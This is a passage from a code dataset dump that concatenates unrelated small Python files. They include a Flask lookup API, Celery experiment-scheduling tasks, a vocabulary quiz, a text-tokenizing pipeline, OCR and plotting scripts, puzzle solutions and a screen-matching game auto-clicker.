collectby = self.get_param('collectby')\n value_type = self.get_param('value_type')\n value_key = self.get_param('value_key')\n identity = self.get_param('identity')\n ele = self.get_element_by(chrome, collectby, identity)\n\n valueCollected = ''\n\n if value_type == 'text':\n valueCollected = 
ele.text\n\n if value_type == 'value':\n valueCollected = ele.get_property('value')\n\n if value_type == 'any':\n valueCollected = self.getValue(ele)\n\n self.populate_data(value_key, valueCollected)\n\n def getValue(self, ele):\n try:\n return ele.text\n except:\n return ele.get_attribute('value')\n","sub_path":"core/processors/FIND_THEN_COLLECTProcessor.py","file_name":"FIND_THEN_COLLECTProcessor.py","file_ext":"py","file_size_in_byte":1024,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"89864092","text":"import datetime as dt\nfrom flask import Flask, jsonify, request\nfrom ipaddress import ip_network, ip_address\nimport netaddr\n\nclass UserStatusSearch:\n RECORDS = [\n {'user_id': 1, 'created_at': '2017-01-01T10:00:00', 'status': 'paying'},\n {'user_id': 1, 'created_at': '2017-03-01T19:00:00', 'status': 'paying'},\n {'user_id': 1, 'created_at': '2017-02-01T12:00:00', 'status': 'cancelled'},\n {'user_id': 3, 'created_at': '2017-10-01T10:00:00', 'status': 'paying'},\n {'user_id': 3, 'created_at': '2016-02-01T05:00:00', 'status': 'cancelled'},\n {'user_id': 3, 'created_at': '2017-10-03T12:52:33', 'status': 'paying'},\n ]\n\n def __init__(self):\n self.treeMap = {}\n for record in UserStatusSearch.RECORDS:\n if record['user_id'] not in self.treeMap:\n self.treeMap[record['user_id']] = {}\n self.treeMap[record['user_id']][record['created_at']] = record['status']\n\n def get_status(self, user_id, date):\n try:\n value = self.treeMap[user_id][date.strftime('%Y-%m-%dT%H:%M:%S')]\n return value\n except:\n return 'non-paying'\n\nclass IpRangeSearch:\n RANGES = {\n 'london': [\n {'start': '10.10.0.0', 'end': '10.10.255.255'},\n {'start': '192.168.1.0', 'end': '192.168.1.255'},\n ],\n 'munich': [\n {'start': '10.12.0.0', 'end': '10.12.255.255'},\n {'start': '172.16.10.0', 'end': '172.16.11.255'},\n {'start': '192.168.2.0', 'end': '192.168.2.255'},\n ]\n }\n\n def __init__(self):\n # self.sorted_cidrs = []\n 
self.cidrs = []\n for key, value in IpRangeSearch.RANGES.items():\n for val in value:\n cidr = netaddr.iprange_to_cidrs(val['start'], val['end'])\n net = ip_network(str(cidr[0]))\n self.cidrs.append((key, net))\n\n def get_city(self, ip):\n for cidr_tuple in self.cidrs:\n if (ip_address(ip) in cidr_tuple[1]):\n return cidr_tuple[0]\n return 'unknown'\n\n\napp = Flask(__name__)\nuser_status_search = UserStatusSearch()\nip_range_search = IpRangeSearch()\n\n\n@app.route('/user_status/')\ndef user_status(user_id):\n \"\"\"\n Return user status for a given date\n\n /user_status/1?date=2017-10-10T10:00:00\n \"\"\"\n date = dt.datetime.strptime(str(request.args.get('date')), '%Y-%m-%dT%H:%M:%S')\n\n return jsonify({'user_status': user_status_search.get_status(int(user_id), date)})\n\n\n@app.route('/ip_city/')\ndef ip_city(ip):\n \"\"\"\n Return city for a given ip\n\n /ip_city/10.0.0.0\n \"\"\"\n return jsonify({'city': ip_range_search.get_city(ip)})\n\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0')\n","sub_path":"api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":2753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"598795071","text":"import pytest\nfrom local.api.models import Genre\n\n\n@pytest.mark.django_db\ndef test_genre_name_max_length_set():\n genre = Genre.objects.create(name=\"thriller\")\n\n max_length = genre._meta.get_field('name').max_length\n\n assert max_length == 200\n\n@pytest.mark.django_db\ndef test_genre_name_str():\n genre = Genre.objects.create(name=\"thriller\")\n\n s = genre.__str__()\n\n assert s == \"thriller\"\n\n\n","sub_path":"tests/local/api/models/test_genre.py","file_name":"test_genre.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"56560140","text":"import os, sys, json, re\n\nclass Handler:\n name=None\n patterns = [\n r'^(ls|list)$',\n r'^(ls|list) 
(networks|machines|targets)$',\n r'^(ls|list) (active|local|repo) (networks|machines|targets)$'\n ]\n\n def __init__(self, config, session):\n self.config = config\n self.session = session\n self.compiled = [re.compile(p) for p in self.patterns]\n self.default_ls = 'local'\n \n def help(self):\n print(\"ls command\")\n print(\"----------\")\n print(\"\\n Usage: list|ls (active|local|repo) \")\n print(\"\\n Example: `ls machines` - lists all local machines\")\n print(\" `ls active networks` - lists all active networks\") \n\n def matches(self, text):\n for p in self.compiled:\n match = p.match(text)\n if(match is not None):\n return match\n return None\n\n def run(self, match, session, config):\n args = self.default_ls\n cmd = None\n if(len(match.groups()) == 3):\n args = match.group(1) \n cmd = match.group(2)\n elif(len(match.groups()) == 1):\n return self.help() \n elif(len(match.groups()) == 2):\n cmd = match.group(2)\n else:\n return \n if(cmd == 'machines'):\n ListMachines(config, session, args, self)\n elif(cmd == 'networks'):\n ListNetworks(config, session, args, self)\n elif(cmd == 'targets'):\n ListTargets(config, session, args, self) \n else:\n pass\n\n\nclass ListTargets:\n name= 'list_targets'\n\n def __init__(self, config, session, args, parent):\n self.config = config\n self.session = session\n self.parent = parent\n self.run()\n\n\n def run(self):\n for idx, machine in enumerate(self.session.targets):\n status = ''\n if(machine is not None and machine.status == 'running'):\n status = \"\"%(machine.vpn_client.ip)\n print(\" [%d] %s\\t%s\\t\\t%s\"%(idx, machine.id, machine.name, status))\n pass \n\n\nclass ListNetworks:\n name= 'list_networks'\n\n def __init__(self, config, session, args, parent):\n self.config = config\n self.session = session\n self.parent = parent\n self.run()\n\n\n def run(self):\n for idx, machine in enumerate(self.session.networks()):\n status = ''\n if(machine is not None and machine.status == 'running'):\n status = 
\"\"%(machine.vpn_client.ip)\n print(\" [%d] %s\\t%s\\t\\t%s\"%(idx+1, machine.id, machine.name, status))\n pass \n\nclass ListMachines:\n name= 'list_machines'\n\n def __init__(self, config, session, args, parent):\n self.config = config\n self.session = session\n self.parent = parent\n self.run()\n\n def run(self):\n for idx, machine in enumerate(self.session.machines()):\n status = ''\n if(machine is not None and machine.status == 'running'):\n status = \"\"%(machine.vpn_client.ip)\n print(\" [%d] %s\\t%s\\t\\t%s\"%(idx+1, machine.id, machine.name, status))\n pass \n","sub_path":"command/List.py","file_name":"List.py","file_ext":"py","file_size_in_byte":3280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"3136255","text":"import os\nfrom datetime import datetime\n\nimport git\n\n\ndef load_directories(path):\n file_name = os.listdir(path)\n file_path = []\n for i in file_name:\n extension = i.split('.')[-1]\n if extension in 'png':\n file_path.append(path + '/' + i)\n file_path.sort()\n return file_path\n\n\ndef create_dir(path):\n if not os.path.isdir(path):\n os.makedirs(path)\n\n\ndef get_root_dir():\n repo = git.Repo(search_parent_directories=True)\n sha = repo.head.object.hexsha\n commit_hash = repo.git.rev_parse(sha)\n now = datetime.now().strftime('%Y%m%d%H%M%S')\n return 'output_lv1/' + commit_hash + '_' + now\n","sub_path":"lv1_src/path_manage.py","file_name":"path_manage.py","file_ext":"py","file_size_in_byte":646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"630977026","text":"import os\nimport random\n\n\ndef path_file():\n work_path = '/Users/evgeny/Project/specialist/python_1/day_3/'\n file_name = 'en-ru.txt'\n return os.path.join(work_path, file_name)\n\n\ndef write_file(en, ru):\n text = f'{en}:{ru}\\n'\n file = open(path_file(), 'a')\n file.write(text)\n\n\ndef revers_dict(lang='en'):\n dict_word = {}\n try:\n file = 
open(path_file(), 'r')\n except FileNotFoundError as fnf:\n print(f'Файл {path_file()} не найден')\n\n if lang == 'en':\n for i in file:\n list_word = i.split(':')\n dict_word.update({list_word[0]:list_word[1].strip()})\n return dict_word\n elif lang == 'ru':\n for i in file:\n list_word = i.split(':')\n dict_word.update({list_word[1].strip():list_word[0]})\n return dict_word\n\n\ndef find_word(word, lang='en'):\n dict_word = {}\n try:\n file = open(path_file(), 'r')\n except FileNotFoundError as fnf:\n print(f'Файл {path_file()} не найден')\n\n if lang == 'en':\n dict_word = revers_dict('en')\n return dict_word.get(word)\n elif lang == 'ru':\n dict_word = revers_dict('ru')\n return dict_word.get(word)\n\n\ndef lang_test(lang):\n wrong = 0\n attempt = 0\n dict_word = {}\n wrong_answer = {0:' Супер, у тебя 5 правильных ответов из 5',\n 1:' Отлично, у тебя 1 неправильный ответ из 5',\n 2:' Хорошо, у тебя 2 неправильный ответа из 5',\n 3:' Плохо, у тебя 3 неправильный ответа из 5',\n 4:' Ужастно, у тебя 4 неправильный ответа из 5',\n 5:' Ты вообще учил?'}\n\n if lang == 'en':\n dict_word = revers_dict('en')\n elif lang == 'ru':\n dict_word = revers_dict('ru')\n\n while attempt != 5:\n question_id = random.choice(list(dict_word.keys()))\n correct_answer = dict_word.get(question_id)\n answer = input(f'Как переводится {question_id} ?: ')\n attempt = attempt + 1\n if answer == correct_answer:\n print(f'Правильно, {correct_answer}')\n elif answer != correct_answer:\n wrong = wrong + 1\n print(f'{answer} Не правильно, будет {correct_answer}')\n print(wrong_answer.get(wrong))\n\n\ndef main():\n while True:\n action = input('Пополнить, Найти или пройти Тест?: ')\n if action.lower() == 'пополнить':\n en = input(' Введите слово на английском: ')\n ru = input(' Введите слово на русском: ')\n write_file(en,ru)\n print(f' Добавлено сочетание {en} - {ru}')\n elif action.lower() == 'найти':\n lang = input(' Какой язык (en или ru): ')\n word = input(' Введите искомое слово: ')\n\n 
print(f'\"{word}\" в переводе будет:' \n if find_word(word, lang) is not None \n else f' \"{word}\" Ненайдено')\n elif action.lower() == 'тест':\n lang = input(' Какой язык (en или ru): ')\n lang_test(lang)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"python_1/day_3/translator.py","file_name":"translator.py","file_ext":"py","file_size_in_byte":3486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"468954991","text":"import threading\nfrom random import randint\nfrom time import sleep\nimport pycurl\nimport json\n\ntry:\n from io import BytesIO\nexcept ImportError:\n from StringIO import StringIO as BytesIO\n\nresult = []\ndef my_function(URL):\n buffer = BytesIO()\n c = pycurl.Curl()\n c.setopt(pycurl.ENCODING, 'gzip, deflate')\n c.setopt(pycurl.CONNECTTIMEOUT, 30)\n c.setopt(pycurl.TIMEOUT, 30)\n c.setopt(c.URL, URL)\n c.setopt(c.WRITEDATA, buffer)\n c.setopt(c.FOLLOWLOCATION, 10)\n c.perform()\n return result.append(c.getinfo(c.TOTAL_TIME))\n\n\nurls = [\n 'http://www.python.org', \n 'http://www.python.org/about/',\n 'http://www.python.org/doc/',\n 'http://www.python.org/download/',\n 'http://www.python.org/getit/',\n 'http://www.python.org/community/',\n 'https://wiki.python.org/moin/',\n]\n\nthread_list = []\n\nfor i in urls:\n # Instantiates the thread\n # (i) does not make a sequence, so (i,)\n t = threading.Thread(target=my_function, args=(i,))\n # Sticks the thread in a list so that it remains accessible\n thread_list.append(t)\n\n# Starts threads\nfor thread in thread_list:\n thread.start()\n\n# This blocks the calling thread until the thread whose join() method is called is terminated.\n# From http://docs.python.org/2/library/threading.html#thread-objects\nfor thread in thread_list:\n thread.join()\n\n# Demonstrates that the main process waited for threads to 
complete\nprint(sum(result))\n","sub_path":"test3.py","file_name":"test3.py","file_ext":"py","file_size_in_byte":1419,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"330279933","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nimport os # noqa # isort:skip\nimport sys # noqa # isort:skip\nimport unittest # noqa # isort:skip\n\nos.environ['PYTHONASYNCIODEBUG'] = '1' # noqa # isort:skip\n\nfrom aiocassandra import aiosession # noqa # isort:skip\nfrom cassandra.cluster import Cluster # noqa # isort:skip\n\n\nif sys.version_info >= (3, 3):\n import asyncio\n from tests_asyncio import AiosessionTestCase\nelse:\n import trollius as asyncio\n from tests_trollius import AiosessionTestCase\n\n\nclass AiocassandraTestCase(AiosessionTestCase):\n def test_malformed_session(self):\n with self.assertRaises(AssertionError):\n aiosession(None)\n\n def test_patched_twice(self):\n with self.assertRaises(RuntimeError):\n aiosession(self.session, loop=self.loop)\n\n def test_main_thread_loop_missing(self):\n with self.assertRaises(RuntimeError):\n try:\n cluster = Cluster()\n\n session = cluster.connect()\n\n aiosession(session)\n finally:\n cluster.shutdown()\n\n def test_main_thread_loop(self):\n try:\n loop = asyncio.new_event_loop()\n loop.set_debug(True)\n asyncio.set_event_loop(loop)\n\n cluster = Cluster()\n session = cluster.connect()\n\n aiosession(session)\n\n self.assertIs(loop, session._loop)\n finally:\n cluster.shutdown()\n loop.call_soon(loop.stop)\n loop.run_forever()\n loop.close()\n\n def test_explicit_loop(self):\n self.assertIs(self.loop, self.session._loop)\n\n def test_session_patched(self):\n self.assertIsNotNone(getattr(self.session, 'execute_future', None))\n\n def tearDown(self):\n self.cluster.shutdown()\n self.loop.call_soon(self.loop.stop)\n self.loop.run_forever()\n self.loop.close()\n\n\nif __name__ == '__main__':\n suite = 
unittest.TestLoader().loadTestsFromTestCase(AiocassandraTestCase)\n unittest.TextTestRunner(verbosity=2).run(suite)\n","sub_path":"tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":2120,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"266090620","text":"\nimport hgtk\nfrom tensorflow.keras.preprocessing.text import Tokenizer\nfrom tensorflow.keras.preprocessing.sequence import pad_sequences\n\nfrom utils import *\nfrom config import *\n\n\ndef eng_preprop(in_str):\n in_str = in_str.lower()\n in_str = in_str.replace(' ', '_')\n in_str = in_str.replace('-', '_')\n return in_str\n\ndef kor_preprop(in_str):\n in_str = in_str.replace(' ', '')\n in_str_decompose = hgtk.text.decompose(in_str)\n in_str_filter = [x for x in list(in_str_decompose) if x != DEFAULT_COMPOSE_CODE]\n in_str_join = ''.join(in_str_filter)\n return in_str_join\n\ndef preprocessing(data):\n# log('> Preprocessing')\n for i, _ in enumerate(data):\n source_eng = data[i].split('\\t')[0]\n target_kor = data[i].split('\\t')[-1]\n data[i] = eng_preprop(source_eng) + '\\t' + kor_preprop(target_kor)\n return data\n\ndef input_formatting(data):\n# log('> Input Formatting')\n input_texts = [] # sentence in original language\n target_texts = [] # sentence in target language\n target_texts_inputs = [] # sentence in target language offset by 1\n \"\"\"\n < korean-go.txt >\n ... ... ...\n gahnite 가나이트\n garnetting 가네팅\n GANEFO 가네포\n garnett 가넷\n ... ... 
...\n \"\"\"\n #t = 0\n #for line in open(os.getcwd() + '/spa.txt'):\n for line in data:\n # only keep a limited number of samples\n #t += 1\n #if t > NUM_SAMPLES:\n # break\n # input and target are separated by tab\n if '\\t' not in line:\n continue\n # split up the input and translation\n input_text, translation = line.rstrip().split('\\t')\n\n # make the target input and output\n # recall we'll be using teacher forcing\n target_text = ' '.join(list(translation)) + ' '\n target_text_input = ' ' + ' '.join(list(translation))\n\n input_texts.append(' '.join(list(input_text)))\n target_texts.append(target_text)\n target_texts_inputs.append(target_text_input)\n\n params['LEN_INPUT_TEXTS'] = len(input_texts)\n return (input_texts, target_texts_inputs, target_texts)\n\ndef tokenizing(input_texts, target_texts_inputs, target_texts, rsrc_path):\n# log('> Tokenizing')\n ## tokenize the inputs\n #tokenizer_inputs = Tokenizer(num_words=MAX_NUM_WORDS)\n tokenizer_inputs = Tokenizer(num_words=params['MAX_NUM_WORDS'], filters='') # MAX_NUM_WORDS = None\n tokenizer_inputs.fit_on_texts(input_texts)\n input_sequences = tokenizer_inputs.texts_to_sequences(input_texts)\n # get the word to index mapping for input language\n word2idx_inputs = tokenizer_inputs.word_index\n params['LEN_WORD2IDX_INPUTS'] = len(word2idx_inputs)\n #print('Found %s unique input tokens.' 
% len(word2idx_inputs))\n # determine maximum length input sequence\n params['MAX_LEN_INPUT'] = max(len(s) for s in input_sequences)\n # save 'tokenizer_inputs' for decoding\n save_pkl(tokenizer_inputs, rsrc_path + '/'+ 'tokenizer_inputs.pkl')\n# log('>> Tokenizer_inputs is saved!')\n\n ## tokenize the outputs\n # tokenize the outputs\n # don't filter out special characters\n # otherwise and won't appear\n tokenizer_outputs = Tokenizer(num_words=params['MAX_NUM_WORDS'], filters='') # MAX_NUM_WORDS = None\n tokenizer_outputs.fit_on_texts(target_texts + target_texts_inputs) # inefficient, oh well\n target_sequences = tokenizer_outputs.texts_to_sequences(target_texts)\n target_sequences_inputs = tokenizer_outputs.texts_to_sequences(target_texts_inputs)\n # get the word to index mapping for output language\n word2idx_outputs = tokenizer_outputs.word_index\n params['LEN_WORD2IDX_OUTPUTS'] = len(word2idx_outputs)\n #print('Found %s unique output tokens.' % len(word2idx_outputs))\n # store number of output words for later\n # remember to add 1 since indexing starts at 1 (index 0 = unknown)\n #num_words_output = len(word2idx_outputs) + 1\n # determine maximum length output sequence\n params['MAX_LEN_TARGET'] = max(len(s) for s in target_sequences) \n # save 'tokenizer_inputs' for decoding\n save_pkl(tokenizer_outputs, rsrc_path + '/' + 'tokenizer_outputs.pkl')\n# log('>> Tokenizer_outputs is saved!')\n\n return (input_sequences, target_sequences_inputs, target_sequences, word2idx_inputs, word2idx_outputs)\n\ndef padding(input_sequences, target_sequences_inputs, target_sequences):\n# log('> Padding')\n # pad the sequences\n encoder_inputs = pad_sequences(input_sequences, maxlen=params['MAX_LEN_INPUT'])\n# log(\">> encoder_data.shape:\", encoder_inputs.shape)\n #print(\"encoder_data[0]:\", encoder_inputs[0])\n\n decoder_inputs = pad_sequences(target_sequences_inputs, maxlen=params['MAX_LEN_TARGET'], padding='post')\n #print(\"decoder_data[0]:\", decoder_inputs[0])\n# 
log(\">> decoder_data.shape:\", decoder_inputs.shape)\n\n decoder_targets = pad_sequences(target_sequences, maxlen=params['MAX_LEN_TARGET'], padding='post')\n\n return (encoder_inputs, decoder_inputs, decoder_targets)\n","sub_path":"engkor_transliterator/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":5046,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"220566827","text":"#!/usr/bin/env python3.7\nimport sys\nimport argparse\n\nimport yaml\nfrom PIL import Image\nfrom pyocr import pyocr\nfrom pyocr import builders\n\n\nwith open(\"../config.yaml\", \"r\") as f:\n config = yaml.safe_load(f)\n\ntools = pyocr.get_available_tools()\ntool = tools[0]\n\ndef ocr_img(img, loc, debug=None):\n image=Image.open(img)\n crop=image.crop(loc)\n if debug != None:\n crop.show()\n print(tool.image_to_string(crop).replace(\"\\n\", \" \"))\n\n# usage '__name__' --loc location --app app1|app2 image\n\ndef main():\n parser = argparse.ArgumentParser(description='Pokemon GO image tester')\n parser.add_argument('--loc', type=str, default=None,\n help=\"Crop location from config file\")\n parser.add_argument('--app', default='app1', type=str,\n help='App to capture: app1|app2')\n parser.add_argument('--debug', help='Debug level, default None', default=None)\n parser.add_argument('imagefile', help='Image file to parse')\n args = parser.parse_args()\n\n debuglvl=args.debug\n\n if args.loc == None:\n print('location needed. 
Exiting')\n sys.exit(0)\n\n print('location: {}'.format(str(config[args.app]['locations'][args.loc])))\n\n print('Checking {} on {}'.format(args.loc, args.app))\n ocr_img(args.imagefile, config[args.app]['locations'][args.loc], debug=debuglvl)\n\nif __name__ == \"__main__\":\n main()\n\n","sub_path":"tools/check_loc.py","file_name":"check_loc.py","file_ext":"py","file_size_in_byte":1388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"616099719","text":"import logging\n\nimport random\n\nfrom polyaxon_schemas.utils import SEARCH_METHODS\n\nfrom experiments.models import Experiment\nfrom experiments.tasks import build_experiment, stop_experiment\nfrom experiment_groups.models import ExperimentGroup\nfrom polyaxon.settings import CeleryTasks, Intervals\nfrom polyaxon.celery_api import app as celery_app\nfrom spawners.utils.constants import ExperimentLifeCycle\n\nlogger = logging.getLogger('polyaxon.tasks.experiment_groups')\n\n\ndef _get_group_ro_retry(experiment_group_id, task):\n try:\n return ExperimentGroup.objects.get(id=experiment_group_id)\n except ExperimentGroup.DoesNotExist:\n logger.info('ExperimentGroup `{}` was not found.'.format(experiment_group_id))\n if task.request.retries < 2:\n logger.info('Trying again for ExperimentGroup `{}`.'.format(experiment_group_id))\n task.retry(countdown=Intervals.EXPERIMENTS_SCHEDULER)\n\n logger.info('Something went wrong, '\n 'the ExperimentGroup `{}` does not exist anymore.'.format(experiment_group_id))\n return None\n\n\n@celery_app.task(name=CeleryTasks.EXPERIMENTS_GROUP_CREATE, bind=True, max_retries=None)\ndef create_group_experiments(self, experiment_group_id):\n experiment_group = _get_group_ro_retry(experiment_group_id=experiment_group_id, task=self)\n if not experiment_group:\n return\n\n # Parse polyaxonfile content and create the experiments\n specification = experiment_group.specification\n # We create a list of indices that we will explore\n if 
SEARCH_METHODS.is_sequential(specification.search_method):\n indices = range(specification.n_experiments or specification.matrix_space)\n elif SEARCH_METHODS.is_random(specification.search_method):\n sub_space = specification.n_experiments or specification.matrix_space\n indices = random.sample(range(specification.matrix_space), sub_space)\n else:\n logger.warning('Search method was not found `{}`'.format(specification.search_method))\n return\n for xp in indices:\n Experiment.objects.create(project=experiment_group.project,\n user=experiment_group.user,\n experiment_group=experiment_group,\n config=specification.parsed_data[xp])\n\n start_group_experiments.apply_async((experiment_group.id,), countdown=1)\n\n\n@celery_app.task(name=CeleryTasks.EXPERIMENTS_GROUP_START, bind=True, max_retries=None)\ndef start_group_experiments(self, experiment_group_id):\n experiment_group = _get_group_ro_retry(experiment_group_id=experiment_group_id, task=self)\n if not experiment_group:\n return\n\n # Check for early stopping before starting new experiments from this group\n if experiment_group.should_stop_early():\n stop_group_experiments(experiment_group_id=experiment_group_id,\n pending=True,\n message='Early stopping')\n return\n\n experiment_to_start = experiment_group.n_experiments_to_start\n pending_experiments = experiment_group.pending_experiments[:experiment_to_start]\n n_pending_experiment = experiment_group.pending_experiments.count()\n\n for experiment in pending_experiments:\n build_experiment.delay(experiment_id=experiment.id)\n\n if n_pending_experiment - experiment_to_start > 0:\n # Schedule another task\n self.retry(countdown=Intervals.EXPERIMENTS_SCHEDULER)\n\n\n@celery_app.task(name=CeleryTasks.EXPERIMENTS_GROUP_STOP_EXPERIMENTS)\ndef stop_group_experiments(experiment_group_id, pending, message=None):\n try:\n experiment_group = ExperimentGroup.objects.get(id=experiment_group_id)\n except ExperimentGroup.DoesNotExist:\n logger.info('ExperimentGroup `{}` was not 
found.'.format(experiment_group_id))\n return\n\n if pending:\n for experiment in experiment_group.pending_experiments:\n # Update experiment status to show that its stopped\n experiment.set_status(status=ExperimentLifeCycle.STOPPED, message=message)\n else:\n for experiment in experiment_group.experiments.exclude(\n experiment_status__status__in=ExperimentLifeCycle.DONE_STATUS).distinct():\n if experiment.is_running:\n stop_experiment.delay(experiment_id=experiment.id)\n else:\n # Update experiment status to show that its stopped\n experiment.set_status(status=ExperimentLifeCycle.STOPPED, message=message)\n","sub_path":"polyaxon/experiment_groups/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":4532,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"248370218","text":"import pandas as pd\r\nimport sys\r\nimport matplotlib.pyplot as plt\r\n\r\nfile_address = sys.argv[1]\r\n\r\ndf = pd.read_csv(file_address)\r\ndf['val_acc'].plot()\r\ndf['acc'].plot()\r\nplt.title('Accuracy Curve')\r\nplt.xlabel('Epoch')\r\nplt.ylabel('Rate(%)')\r\nplt.legend()\r\nplt.show()\r\n\r\ndf['val_loss'].plot()\r\ndf['loss'].plot()\r\nplt.title('Loss Curve')\r\nplt.xlabel('Epoch')\r\nplt.ylabel('value')\r\nplt.legend()\r\nplt.show()\r\n\r\n\r\n","sub_path":"hw6/draw_a_picture.py","file_name":"draw_a_picture.py","file_ext":"py","file_size_in_byte":410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"151017747","text":"########\n#Solved#\n########\n\n#The sum of the squares of the first ten natural numbers is,\n#12 + 22 + ... + 102 = 385The square of the sum of the first ten natural numbers is,\n#(1 + 2 + ... 
+ 10)2 = 552 = 3025Hence the difference between the sum of the squares of the first ten natural numbers and the square of the sum is 3025  385 = 2640.\n#Find the difference between the sum of the squares of the first one hundred natural numbers and the square of the sum.\n\ninit = 1\nend = 100\nsum1 = 0\nsum2 = 0\n\nfor f in range(int(init),int(end + 1)):\n sum1 = f * f + sum1\n sum2 = f + sum2\n\nprint(sum2 * sum2 - sum1)\n","sub_path":"6.py","file_name":"6.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"149937217","text":"from Baseline import Baseline\nfrom ScreenMatcher import ScreenMatcher\nfrom MatchCleaner import MatchCleaner\nfrom Clicker import Clicker\n\nmc_string = None;\nbase = Baseline();\nsm = ScreenMatcher(\"templates/interface/lunar_book.png\");\nmc = MatchCleaner(sm.getPositions());\ncl = Clicker(chance=100);\n\ncl.LC(mc.getCenters()[0], 0.5);\nbase.compass();\n\n\nsm.setTemplate(\"templates/interface/spin_flax.png\");\nmc.setRawPos(sm.getPositions());\nfor i in range(5):\n\t\tcl.LC(mc.getCenters()[0], 3);\n\nwhile True:\n\tsm.setTemplate(\"templates/world/edge_bank.png\");\n\tsm.setThresh(0.7);\n\tmc.setRawPos(sm.getPositions())\n\tcl.LC(mc.getCenters()[0], 0.5);\n\n\t\n\tif mc_string == None:\n\t\tsm.setTemplate(\"templates/items/bow_string.png\");\n\t\tmc_string = MatchCleaner(sm.getPositions());\n\tcl.RC(mc_string.getCenters()[0], 0.2);\n\n\tsm.setTemplate(\"templates/interface/all.png\");\n\tmc.setRawPos(sm.getPositions())\n\tcl.LC(mc.getCenters()[0], 0.2);\n\n\tsm.setTemplate(\"templates/items/flax.png\");\n\tmc.setRawPos(sm.getPositions());\n\tcl.RC(mc.getCenters()[0], 0.2);\n\n\tsm.setTemplate(\"templates/interface/all.png\");\n\tmc.setRawPos(sm.getPositions());\n\tcl.LC(mc.getCenters()[0], 0.2);\n\n\tsm.setTemplate(\"templates/interface/close_bank.png\");\n\tmc.setRawPos(sm.getPositions());\n\tcl.LC(mc.getCenters()[0], 
0.1);\n\n\tsm.setTemplate(\"templates/interface/spin_flax.png\");\n\tmc.setRawPos(sm.getPositions());\n\tfor i in range(5):\n\t\tcl.LC(mc.getCenters()[0], 3);\n\n\n\t\n\n\t\n\n\t\n\n\t\n\t\n\t\n\t\n","sub_path":"gui_bot_builder/OldSchoolRunescapeBots/OldSchoolRunescapeBots/Flaxbot.py","file_name":"Flaxbot.py","file_ext":"py","file_size_in_byte":1425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"120580611","text":"##############################\n# #\n# Instructions #\n# #\n##############################\n\n# To run, use the following command:\n# $ python therealsue.py \n# where is the filename with the question's input\n\nimport sys\nimport re\n\n# Check to make sure correct number of arguments supplied\nif (len(sys.argv) != 2):\n print('Invalid number of arguments!')\n sys.exit()\n\n# Read the input from the file provided as argument\ninput_file = open(sys.argv[1])\npuzzle_input = input_file.readlines()\ninput_file.close()\n\n# Array indices\nchildren = 0\ncats = 1\nsamoyeds = 2\npomeranians = 3\nakitas = 4\nvizslas = 5\ngoldfish = 6\ntrees = 7\ncars = 8\nperfumes = 9\n\n# Properties which the aunt must have more than, less than, or exactly the right amount\ngreater_than_properties = [cats, trees]\nless_than_properties = [pomeranians, goldfish]\nequal_properties = [children, samoyeds, akitas, vizslas, cars, perfumes]\n\n# The target properties of the real aunt\naunt_properties = [3, 7, 2, 3, 0, 0, 5, 3, 2, 1]\n\n# Regexes to find the properties of each aunt remembered\naunt_regexes = [r'children: (\\d+)', r'cats: (\\d+)', r'samoyeds: (\\d+)', r'pomeranians: (\\d+)', r'akitas: (\\d+)', r'vizslas: (\\d+)', r'goldfish: (\\d+)', r'trees: (\\d+)', r'cars: (\\d+)', r'perfumes: (\\d+)']\n\n# The list of aunts so far\naunts = []\n\n# For each aunt in the input\nfor line in puzzle_input:\n\t# Start with -1 for all the values\n\taunt = [-1 for i in range(10)]\n\n\t# For each property, check if it was remembered about 
the aunt and, if so, update the list\n\tfor i in range(len(aunt_regexes)):\n\t\tmatch = re.search(aunt_regexes[i], line)\n\t\tif match:\n\t\t\taunt[i] = int(match.group(1))\n\n\t# Add the new aunt to the list so far\n\taunts.append(aunt)\n\n# Loop through all the aunts and find the one who matches all the properties\n# When they are found, print out their number\nfor aunt in range(len(aunts)):\n\tthe_real_aunt = True\n\tfor i in greater_than_properties:\n\t\tif not (aunts[aunt][i] > aunt_properties[i] or aunts[aunt][i] == -1):\n\t\t\tthe_real_aunt = False\n\tfor i in less_than_properties:\n\t\tif not (aunts[aunt][i] < aunt_properties[i] or aunts[aunt][i] == -1):\n\t\t\tthe_real_aunt = False\n\tfor i in equal_properties:\n\t\tif not (aunts[aunt][i] == aunt_properties[i] or aunts[aunt][i] == -1):\n\t\t\tthe_real_aunt = False\n\tif the_real_aunt:\n\t\tprint ('The aunt who sent the gift was Aunt Sue #', aunt + 1)\n","sub_path":"day_16/therealsue.py","file_name":"therealsue.py","file_ext":"py","file_size_in_byte":2424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"16099917","text":"#!/usr/bin/env python\n# 